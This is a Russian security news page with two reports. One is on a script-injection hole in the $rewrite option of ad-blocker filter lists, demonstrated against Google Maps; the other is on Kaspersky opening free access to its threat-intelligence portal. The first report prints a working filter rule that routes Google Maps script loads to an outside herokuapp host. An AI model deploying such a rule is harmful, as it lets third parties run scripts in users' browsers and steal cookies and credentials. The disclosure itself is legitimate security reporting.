Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Новый эксплойт, недавно обнаруженный экспертом в области кибербезопасности, способен использовать фильтры популярных блокировщиков рекламы Adblock Plus, AdBlock и uBlocker для инъекции сторонних скриптов в код страниц веб-сайтов.

Adblock Plus, AdBlock и uBlocker представляют собой специальные расширения для браузеров, помогающие пользователям скрывать надоедливую и агрессивную рекламу со страниц ресурсов.

База пользователей этих блокировщиков насчитывает более 10 миллионов человек. Таким образом, если злоумышленнику удастся внедрить вредоносные скрипты, он получит возможность красть файлы cookie, учетные данные, а также осуществлять нужные ему редиректы.

Работа блокировщиков рекламы завязана на использовании списка URL, на которых был отмечен рекламный контент или даже вредоносное поведение. Тот же Adblock Plus, например, запрещает браузеру подключаться к этим ссылкам, следовательно, рекламные скрипты не в состоянии загрузиться.

Вся проблема кроется в опции списка фильтров под названием $rewrite, которая была представлена в 2018 году (в Adblocker Plus 3.2). Эта функция позволяет разработчику подменить запрос, совпадающий с определенным регулярным выражением, другим URL.

Единственное условие — заменяемая строка должна быть относительным URL-адресом. Таким образом, если запрос для example.com/ad.gif заменить на example.com/puppies.gif, пользователь вместо рекламы увидит картинку с милыми щенками.

При этом разработчики предусмотрели защиту, запретив запросы вида SCRIPT, SUBDOCUMENT, OBJECT и OBJECT_SUBREQUEST — с ними эта функция не будет работать.

Однако исследователь Армин Себастьян нашел способ, позволяющий создать правило, благодаря которому сторонний скрипт можно встроить в контент конкретного сайта.

Для этого потребуется найти ресурс, который допускает загрузку скриптов со сторонних доменов, а также использует XMLHttpRequest или Fetch для загрузки скриптов. Сам Себастьян довольно быстро нашел такой ресурс — он использовал Google Maps для демонстрации уязвимости.

Google Maps использует XMLHttpRequest для загрузки скриптов, что позволило эксперту воспользоваться функцией фильтров $rewrite для задействования скрипта со стороннего домена. Пример:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Если пользователь в этом случае посетит google[.]com/maps/, фильтр использует редиректы Google для считывания контента с majestic-ramsons.herokuapp[.]com/.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Kaspersky открывает доступ к функциям системы информирования об угрозах

Хорошие новости для аналитиков SOC-команд и экспертов по реагированию на инциденты: «Лаборатория Касперского» открыла свободный доступ к базовым функциям Kaspersky Threat Intelligence. Напомним, что данный портал является единой точкой входа в глобальную систему информирования об угрозах.

Таким образом, специалисты, работающие как штатно, так и у поставщиков услуг, смогут быстро сортировать киберинциденты по степени риска, а также выбирать наиболее эффективные меры борьбы с угрозами.

Все это станет возможным благодаря доступу к актуальной и постоянно обновляемой базе знаний, куда входит информация о тактиках и техниках современных киберпреступников.

Исследования «Лаборатории Касперского» показали, что лишь 31% компаний использует потоки данных об угрозах. При этом ещё 19% планируют выделить на это бюджет в следующем году. Вопрос: что же мешает бизнесу? Ответ: высокая стоимость таких сервисов.

Решению этой проблемы частично может поспособствовать доступ к Kaspersky Threat Intelligence. Благодаря сервису «Лаборатории Касперского» эксперты и аналитики смогут проверять до ста подозрительных объектов: IP, URL, домены, контрольные суммы файлов. В результате специалистам станут доступны актуальные и подробные данные, среди которых можно выделить название угроз, статистику и информацию об их активности.

Четко организованная работа Kaspersky Threat Intelligence позволяет системе ежедневно обнаруживать более 346 тысяч новых злонамеренных объектов. Среди продвинутых технологий, используемых этим порталом, есть эвристический анализ и облачная песочница Kaspersky Cloud Sandbox.

Артём Карасёв, старший менеджер по маркетингу сервисов кибербезопасности «Лаборатории Касперского», рассказал Anti-Malware.ru, что в будущем антивирусная компания планирует запустить API для зарегистрированных пользователей. Следовательно, появится возможность для автоматизации поиска угроз в сети.

Поскольку фиды являются коммерческим сервисом, «Лаборатория Касперского» не предоставляет его бесплатно. Однако Артём Карасёв подчёркивает:

«Данный сценарий можно покрыть использованием CyberTrace (до одного миллиона индикаторов можно всегда будет грузить бесплатно), а также нашими demo-фидами и возможностью формировать свои "чёрные списки"».

Помимо этого, в ходе общения с Карасёвым, у Anti-Malware.ru справедливо возник вопрос: нет ли риска, что злоумышленники будут использовать Kaspersky Threat Intelligence, чтобы просмотреть информацию о своих разработках.

«Теоретически у злоумышленников уже сейчас есть такая возможность: например путем тестирования потенциальных вредоносов на машинах с установленными защитными решениями или через другие публичные сервисы вроде VirusTotal», — ответил Артём.

«Мы наоборот заинтересованы в анализе неизвестных угроз, так как "Лаборатория Касперского" обладает различными технологиями для детектирования ранее неизвестного вредоносного ПО. С другой стороны, мы будем также получать информацию о файлах, на которых по какой-либо причине не сработали наши технологии, но которые могут быть подозрительными».

«Это приведет к ручному анализу этого файла нашими аналитиками, в итоге мы все равно придём к детекту реального зловреда (хотя злоумышленник будет думать, что его зловред остается недетектируемым)».

Бесплатный доступ к информации о каком-либо файле подразумевает следующие данные:

  • Вердикт: вредоносный или легитимный.
  • Популярность поиска файла.
  • Дата первого и последнего детектирования.
  • Формат.
  • Размер файла.
  • Кем подписан.
  • Чем упакован.
  • Хеши (md5/sha1/sha256).
  • Имя детекта, включая классификацию песочницы.

Бесплатный доступ к информации о домене или URL:

  • Вердикт: вредоносный ли это домен или ссылка.
  • Популярность поиска.
  • Когда был создан домен. Когда его срок его действия истекает.
  • Число IPv4.
  • Число файлов.
  • Число URL.
  • Зарегистрировавшая домен организация.
  • Имя регистратора.
  • Категория.

Портал доступен по ссылке: https://opentip.kaspersky.com/.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru